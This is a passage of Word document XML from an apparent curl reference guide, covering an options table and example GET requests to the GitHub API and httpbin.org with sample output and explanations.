          <w:p w14:paraId="5DF33C29" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Head request only (headers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6B959636" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61DAB3FF"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v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E382950" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="235CA8FE" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64B07FA4"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="621D9151" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Silent mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="39FC5B7B" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34CBE693"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f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D596820" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Fail silently on HTTP errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="632A2642" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="214E5EF1"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k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="569D148C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Ignore SSL certificate errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3DC943CC" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="630AA54A"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u user:pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A73F6A1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Basic authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0DABBDC3" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D3AC39F"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A "agent"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="026F94CA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set User-Agent string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6A6E06A0" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="109B940C"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b cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8B4F4D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Send cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="313281DE" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A01172C"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c cookiejar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36E2ADCE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Save cookies to file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="43AA2158" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79ACE6CE"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T filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="791F5FC6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Upload file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="1DC57C00" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70CE14E4"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w format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D046C8F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Custom output format</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7A7C0974" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C32BB81"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m seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="015023DA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Maximum time for operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="007282DE" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0383AE3E"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connect-timeout seconds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DC02C5B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Connection timeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6B14FE86" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44133007"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max-redirs num</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F264AEC" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Maximum redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3B205A25" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F753CC3"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proxy proxy:port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA8D5D6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use proxy server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2966D736" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="632F0A64"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data-urlencode data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EAE8D13" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>URL encode data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3B486EC1" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695B0D21"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json data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65139503" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Send JSON data (curl 7.82+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7BEAC37A" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64CDB3B5"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compressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42741F8A" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Request compressed response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5DC72600" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="785A110F"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limit-rate rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="324D6276" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Limit transfer rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="667B1A0E" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C09C5BC"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retry num</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DF3A12D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Retry on failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="0C1282B9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA37BB5"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cert cert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CD8274" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Client certificate file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="3143E3F9" w14:textId="77777777" w:rsidTr="00030A25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2D99DF"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key key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1974CF5D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00030A25">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Private key file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="148DA259" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899F079" w14:textId="05E0EE89" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB180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https://api.github.com/users/octocat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C524ED" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302658E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2DC10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login": "octocat",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58540AD4"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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B305191"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node_id": "MDQ6VXNlcjE=",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5E66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avatar_url": "https://github.com/images/error/octocat_happy.gif",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854657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gravatar_id": "",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4751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url": "https://api.github.com/users/octocat",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCF9C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html_url": "https://github.com/octocat",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09971C0A"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followers_url": "https://api.github.com/users/octocat/followers",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051B6FD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following_url": "https://api.github.com/users/octocat/following{/other_user}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D8A0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type": "User",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC4237A"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site_admin": false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6591D45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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CD3D8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7DA11" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON response</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: API returns structured data in JSON format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965746C" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User information</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: GitHub user profile data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2430408F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URLs</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Related API endpoints for additional information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2961F2" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clean output</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Default curl behavior shows only response body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509F835D" w14:textId="6044DB44" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="005F3C78">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Include response headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F69B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i https://httpbin.org/get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2AC949" w14:textId="4F9605B1" w:rsidR="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Oitput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18023E33"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 xml:space="preserve">HTTP/2 200 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918F1F0"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date: Sat, 31 Aug 2025 14:30:25 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D063BA3"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content-type: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A9F94"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content-length: 314</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0538AF8F"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server: gunicorn/19.9.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3BCAA"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access-control-allow-origin: *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59BD0C"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access-control-allow-credentials: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B62F6D"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0D466009"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDF0146"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 xml:space="preserve">  "args": {}, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940C9A0"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  "headers": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1583C7E2"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 xml:space="preserve">    "Accept": "*/*", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97EAE3"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 xml:space="preserve">    "Host": "httpbin.org", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1AF2BD"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 xml:space="preserve">    "User-Agent": "curl/7.68.0", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADF0245"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    "X-Amzn-Trace-Id": "Root=1-64f0123a-456789abcdef0123456789ab"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1866E118"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 xml:space="preserve">  }, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD608E5"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 xml:space="preserve">  "origin": "203.0.113.45", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720155A" w14:textId="77777777"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  "url": "https://httpbin.org/get"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCFA8B0" w14:textId="651C6068" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF"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C702AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF6F111" w14:textId="4EEFBAE2" w:rsidR="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00251962">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89C116" w14:textId="27D87C85" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>HTTP/2 200: Protocol version and successful status code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C11F77" w14:textId="0CC7CD66" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>Response headers: Server metadata including date, content-type, and server software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0F417" w14:textId="3066BBC4" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
        <w:t>content-length: 314: Size of response body in bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D010AB9" w14:textId="526BD6B6" w:rsidR="00C702AF" w:rsidRPr="00C702AF" w:rsidRDefault="00C702AF" w:rsidP="00C702AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C702AF">
